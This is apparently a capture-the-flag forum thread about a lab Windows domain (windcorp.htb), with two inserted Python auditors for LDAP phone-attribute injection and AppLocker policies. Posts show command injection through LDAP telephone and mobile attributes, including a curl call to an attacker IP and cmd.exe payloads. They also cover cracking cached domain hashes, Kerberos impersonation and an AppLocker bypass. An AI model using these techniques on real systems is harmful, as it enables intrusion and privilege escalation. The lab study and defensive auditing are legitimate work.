Posts: 57 Threads: 0 Joined: N/A September 19, 2022 at 8:20 AM
Trying the following command to replace the phone number with a command injection:
ldiff file
dn: CN=scriptrunner,CN=Users,DC=windcorp,DC=htb
changetype: modify
replace: telephonenumber
telephonenumber:" ; cmd.exe /c curl http://10.10.14.20:1234/ > \wc-share\segundo.txt "
command:
ldapmodify -h hope.windcorp.htb -D "CN=scriptrunner,CN=Users,DC=windcorp,DC=htb" -w "PASSWORD" -f test.ldiff
I get an error
ldap_bind: Invalid credentials (49)
additional info: 80090308: LdapErr: DSID-0C090436, comment: AcceptSecurityContext error, data 52e, v4f7c
Posts: 213 Threads: 0 Joined: N/A September 19, 2022 at 8:41 AM
(September 19, 2022, 08:20 AM)samhub123 Wrote: Trying the following command to replace the phone number with a command injection:
ldiff file
dn: CN=scriptrunner,CN=Users,DC=windcorp,DC=htb
changetype: modify
replace: telephonenumber
telephonenumber:" ; cmd.exe /c curl http://10.10.14.20:1234/ > \wc-share\segundo.txt "
command:
ldapmodify -h hope.windcorp.htb -D "CN=scriptrunner,CN=Users,DC=windcorp,DC=htb" -w "PASSWORD" -f test.ldiff
I get an error
ldap_bind: Invalid credentials (49)
additional info: 80090308: LdapErr: DSID-0C090436, comment: AcceptSecurityContext error, data 52e, v4f7c
echo "dn: CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb" > /root/mod.txt
echo "changetype: modify" >> /root/mod.txt
echo "replace: mobile" >> /root/mod.txt
echo "mobile: 1; cmd.exe /c whoami > \wc-share\test.txt" >> /root/mod.txt
ldapmodify -f /root/mod.txt -h hope.windcorp.htb
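The mobile / telephoneNumber trick in the two posts above works because something on the box hands the attribute value to a shell without checking it. What follows is an added example, not code from this thread, from the box or from any tool it mentions: a small Python audit that parses an LDIF modify record of the shape shown above and rejects phone attribute values that fail a strict allowlist, naming the shell metacharacters it finds. The attribute set, the allowlist regex, the function names and the two sample LDIF records are this example's own assumptions.

```python
"""Audit an LDIF 'changetype: modify' for shell metacharacters in phone attributes.

Added example (not code from the thread). A script that consumes LDAP phone
attributes must treat them as untrusted input: validate against an allowlist
before any shell sees them, and flag modify requests whose values could never
be a phone number. Attribute names, regex and sample records are constructed.
"""
import re
from typing import Dict, List, Optional, Tuple

# Attributes a phone-number handling script is likely to read (assumed set).
PHONE_ATTRS = {"telephonenumber", "mobile", "homephone", "pager", "facsimiletelephonenumber"}

# Allowlist: optional leading '+', then digits, spaces, parentheses, dots, hyphens.
PHONE_RE = re.compile(r"^\+?[0-9][0-9 ().-]{2,31}$")

# Characters that let a value break out of a cmd.exe or sh command line.
SHELL_META = set(';&|<>`$\'"\n\r')


def is_valid_phone(value: str) -> bool:
    """True only if the value matches the phone-number allowlist."""
    return bool(PHONE_RE.match(value))


def parse_ldif_modify(text: str) -> Tuple[str, List[Tuple[str, str, str]]]:
    """Parse one LDIF modify record into (dn, [(op, attribute, value), ...]).

    Supports 'replace:'/'add:'/'delete:' blocks separated by '-'. Base64 values
    ('attr:: ...') are rejected here so nothing slips past the text checks.
    """
    dn = ""
    ops: List[Tuple[str, str, str]] = []
    current_op: Optional[str] = None
    current_attr: Optional[str] = None
    for raw in text.splitlines():
        line = raw.rstrip("\n")
        if not line or line == "-":
            continue
        if "::" in line.split(" ", 1)[0]:
            raise ValueError("base64 attribute values are not supported here")
        key, _, val = line.partition(":")
        key, val = key.strip().lower(), val.strip()
        if key == "dn":
            dn = val
        elif key == "changetype":
            if val.lower() != "modify":
                raise ValueError(f"not a modify record: {val}")
        elif key in ("replace", "add", "delete"):
            current_op, current_attr = key, val.lower()
        elif current_op and key == current_attr:
            ops.append((current_op, key, val))
    return dn, ops


def audit_ldif(text: str) -> List[Dict[str, str]]:
    """Return one finding per phone attribute whose new value fails the allowlist."""
    dn, ops = parse_ldif_modify(text)
    findings: List[Dict[str, str]] = []
    for op, attr, val in ops:
        if attr in PHONE_ATTRS and not is_valid_phone(val):
            meta = "".join(sorted(c for c in val if c in SHELL_META))
            reason = f"shell metacharacters {meta!r}" if meta else "not a phone number"
            findings.append({"dn": dn, "op": op, "attribute": attr, "value": val, "reason": reason})
    return findings


# Constructed samples: the shape of the modify shown in the thread, and a benign one.
INJECTED_LDIF = """dn: CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb
changetype: modify
replace: mobile
mobile: 1; cmd.exe /c whoami > \\wc-share\\test.txt
"""

BENIGN_LDIF = """dn: CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb
changetype: modify
replace: mobile
mobile: +1 555-0100
"""

if __name__ == "__main__":
    for label, ldif in (("injected", INJECTED_LDIF), ("benign", BENIGN_LDIF)):
        print(label, audit_ldif(ldif) or "clean")
```

The same allowlist belongs in the consuming script itself: a value that passes is_valid_phone cannot contain ';', '>' or quotes, so it can be passed as a single argv element without ever building a command string.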
Posts: 57 Threads: 0 Joined: N/A September 19, 2022 at 8:48 AM
(September 19, 2022, 08:41 AM)Exa Wrote:
(September 19, 2022, 08:20 AM)samhub123 Wrote: Trying the following command to replace the phone number with a command injection: [...]
echo "dn: CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb" > /root/mod.txt
echo "changetype: modify" >> /root/mod.txt
echo "replace: mobile" >> /root/mod.txt
echo "mobile: 1; cmd.exe /c whoami > \wc-share\test.txt" >> /root/mod.txt
ldapmodify -f /root/mod.txt -h hope.windcorp.htb
ahh, interesting, thanks
Posts: 57 Threads: 0 Joined: N/A September 20, 2022 at 12:15 AM
The following command works:
mobile: 2;cmd.exe /c powershell -h > \wc-share\foo.txt
but any other powershell I cannot seem to get running
Posts: 78 Threads: 0 Joined: N/A September 20, 2022 at 12:53 AM
(September 15, 2022, 07:33 PM)Hacker2222 Wrote:
(September 15, 2022, 05:39 AM)meowmeowattack Wrote: not sure what to proceed next
after inspecting the ldb file, where you can find the domain sid, a domain user and the credential hash
var/lib/sss/db/cache_windcorp.htb.ldb
the credential hash can be john'd to reveal the password of the domain user; from there, can also do impersonation to get an Administrator.ccache
but the thing is, from the dns zone transfer and other info found, there are only two hosts found in the domain, webserver and hope, and none of them has any of the smb, ldap ports open. i start to wonder where to proceed next.
it is curious though, which host is serving the ssh port; it's nowhere to be found yet.
Edit: found new hosts by cracking the known_hosts file.
i think u can use password of ray.duncan to login with ssh? container has kinit & u can login using kinit ray.duncan then ssh -k to login? ssh login as ray.duncan does not work tho .......
(September 19, 2022, 12:46 AM)Hacker2222 Wrote: box creator has bypass on github LOL https://github.com/4ndr34z/CLMBypassBlogpost just build c#, put exe in applocker exception dir. have not tried. maybe tomorrow
(September 19, 2022, 01:09 AM)meowmeowattack Wrote: lol, of course... this is a very customised box. no wonder this didn't pop up in the search result
(September 19, 2022, 01:12 AM)Hacker2222 Wrote: repo is a fork ...... think the original is better with char limit.
pls say if the code works so i dont have to try tomorrow ajjaja
(September 19, 2022, 08:12 AM)meowmeowattack Wrote: haven't succeeded yet, so far i've tried: the link you found, mshta, alternative data stream, powershell downgrade (not enabled) and things listed here: https://github.com/api0cradle/UltimateAppLockerByPassList
(September 19, 2022, 02:58 PM)Hacker2222 Wrote: u can get shell with https://github.com/4ndr34z/CLMBypassBlogpost just compile bypass c# and then put in applocker exception dir. u can get applocker exceptions with Get-AppLockerPolicy -Effective -Xml > /wc-share/derivacion .... then execute and shell
dont know next step tho
the compiled binary doesn't seem to run even in an applocker exception folder that's globally writable to everyone. not sure what i'm missing
* change the bypass code to point to my server
* compiled the bypass on windows. tested
* sent it to the target under an exception folder using wget
* run it by calling the full path to the binary
Posts: 78 Threads: 0 Joined: N/A September 20, 2022 at 1:11 AM
(September 20, 2022, 12:56 AM)Hacker2222 Wrote:
(September 20, 2022, 12:53 AM)meowmeowattack Wrote:
(September 15, 2022, 07:33 PM)Hacker2222 Wrote:
(September 15, 2022, 05:39 AM)meowmeowattack Wrote: not sure what to proceed next
after inspecting the ldb file, where you can find the domain sid, a domain user and the credential hash
var/lib/sss/db/cache_windcorp.htb.ldb
the credential hash can be john'd to reveal the password of the domain user; from there, can also do impersonation to get an Administrator.ccache
but the thing is, from the dns zone transfer and other info found, there are only two hosts found in the domain, webserver and hope, and none of them has any of the smb, ldap ports open. i start to wonder where to proceed next.
it is curious though, which host is serving the ssh port; it's nowhere to be found yet.
Edit: found new hosts by cracking the known_hosts file.
i think u can use password of ray.duncan to login with ssh? container has kinit & u can login using kinit ray.duncan then ssh -k to login? ssh login as ray.duncan does not work tho .......
[...]
the compiled binary doesn't seem to run even in an applocker exception folder that's globally writable to everyone. not sure what i'm missing
* change the bypass code to point to my server
* compiled the bypass on windows. tested
* sent it to the target under an exception folder using wget
* run it by calling the full path to the binary
what dir u used?
read applocker exceptions correctly .... exceptions are confusing
ye, i was worried that i could interpret the term exception incorrectly, therefore i tried two folders: c:\windows\temp and c:\windows\debug
Posts: 57 Threads: 0 Joined: N/A September 20, 2022 at 1:12 AM
I have also tried C:\ProgramData and C:\ProgramFiles
Posts: 57 Threads: 0 Joined: N/A September 20, 2022 at 1:48 AM
Hacker2222 Wrote:
samhub123 Wrote: I have also tried C:\ProgramData and C:\ProgramFiles
try writeable dirs in %WINDIR% not in exception list
I did an icacls on C:\windows\* and also checked whoami /groups but i dont see anything that has modify permissions.
Posts: 78 Threads: 0 Joined: N/A September 20, 2022 at 3:49 AM
Hacker2222 Wrote:
meowmeowattack Wrote: not sure what to proceed next [...]
i think u can use password of ray.duncan to login with ssh? container has kinit & u can login using kinit ray.duncan then ssh -k to login?
ssh login as ray.duncan does not work tho .......
samhub123 Wrote: I have also tried C:\ProgramData and C:\ProgramFiles
Hacker2222 Wrote: try writeable dirs in %WINDIR% not in exception list
samhub123 Wrote: I did an icacls on C:\windows\* and also checked whoami /groups but i dont see anything that has modify permissions.
Hacker2222 Wrote: just google writeable dirs on %WINDIR% and look at exceptions. u can have write on dirs within dirs.....
i think i stepped on my own feet while trying to keep the commands as short as possible. it turns out for start-process to run an exe, the file extension actually matters....
Posts: 57 Threads: 0 Joined: N/A September 20, 2022 at 4:20 AM
meowmeowattack Wrote: [...] i think i stepped on my own feet while trying to keep the commands as short as possible. it turns out for start-process to run an exe, the file extension actually matters....
what payload are you compiling into the bypass?
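The later posts all turn on AppLocker exceptions: the default allow rule for the Windows folder trusts every subfolder unless the user-writable ones are carved out as exceptions, which is why the thread keeps coming back to "Get-AppLockerPolicy -Effective -Xml". As an added example, not code from the thread or from the repositories it links, here is a Python audit of that exported XML from the defender's side: it flags allow rules that cover a whole system root with no exceptions at all, rule collections that are not enforced, and catch-all path rules granted to anyone other than Administrators. The sample policy, its rule Ids and names, and the helper names are constructed for this example and are not this box's policy.

```python
"""Audit an exported AppLocker policy for over-broad path rules.

Added example (not code from the thread). Reads the XML produced by
Get-AppLockerPolicy -Effective -Xml and reports configuration weaknesses a
reviewer would want fixed before a box like this goes live. The sample policy
and its rule Ids/names are constructed, not taken from any real host.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List

# System roots that the default rules allow wholesale; each needs exceptions
# for any subfolder that standard users can write to (assumed check list).
BROAD_ROOTS = {"%WINDIR%\\*", "%SYSTEM32%\\*"}
ADMIN_SID = "S-1-5-32-544"  # BUILTIN\Administrators
ENFORCED_TYPES = ("Exe", "Script", "Dll", "Msi")


def audit_applocker(xml_text: str) -> List[Dict[str, str]]:
    """Return a list of findings; an empty list means nothing was flagged."""
    root = ET.fromstring(xml_text)
    findings: List[Dict[str, str]] = []
    for coll in root.findall("RuleCollection"):
        ctype = coll.get("Type", "?")
        mode = coll.get("EnforcementMode", "NotConfigured")
        if ctype in ENFORCED_TYPES and mode != "Enabled":
            findings.append({"collection": ctype, "rule": "",
                             "issue": f"collection not enforced ({mode})"})
        for rule in coll.findall("FilePathRule"):
            if rule.get("Action") != "Allow":
                continue  # deny rules never widen what can run
            name = rule.get("Name") or rule.get("Id", "?")
            sid = rule.get("UserOrGroupSid", "")
            paths = [c.get("Path", "") for c in rule.findall("Conditions/FilePathCondition")]
            exceptions = [c.get("Path", "") for c in rule.findall("Exceptions/FilePathCondition")]
            for path in paths:
                if path == "*" and sid != ADMIN_SID:
                    findings.append({"collection": ctype, "rule": name,
                                     "issue": f"catch-all path '*' allowed for {sid}"})
                elif path.upper() in BROAD_ROOTS and not exceptions:
                    findings.append({"collection": ctype, "rule": name,
                                     "issue": f"{path} allowed with no exceptions for writable subfolders"})
    return findings


# Constructed sample policy in the schema Get-AppLockerPolicy -Xml exports.
SAMPLE_POLICY = """<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="Enabled">
    <FilePathRule Id="11111111-0000-0000-0000-000000000001" Name="(Sample) Program Files" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="11111111-0000-0000-0000-000000000002" Name="(Sample) Windows folder" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="11111111-0000-0000-0000-000000000003" Name="(Sample) Admins run anything" UserOrGroupSid="S-1-5-32-544" Action="Allow">
      <Conditions><FilePathCondition Path="*" /></Conditions>
    </FilePathRule>
  </RuleCollection>
  <RuleCollection Type="Script" EnforcementMode="AuditOnly" />
</AppLockerPolicy>
"""

# Same policy with a Temp exception on the Windows rule and scripts enforced.
HARDENED_POLICY = SAMPLE_POLICY.replace(
    '<Conditions><FilePathCondition Path="%WINDIR%\\*" /></Conditions>',
    '<Conditions><FilePathCondition Path="%WINDIR%\\*" /></Conditions>'
    '<Exceptions><FilePathCondition Path="%WINDIR%\\Temp\\*" /></Exceptions>',
).replace('EnforcementMode="AuditOnly"', 'EnforcementMode="Enabled"')

if __name__ == "__main__":
    for label, policy in (("sample", SAMPLE_POLICY), ("hardened", HARDENED_POLICY)):
        print(label, audit_applocker(policy) or "no findings")
```

Run it against a real export by reading the file into audit_applocker; an empty result only means the three checks passed, so the exception list still has to be compared against the folders standard users can actually write to on that host.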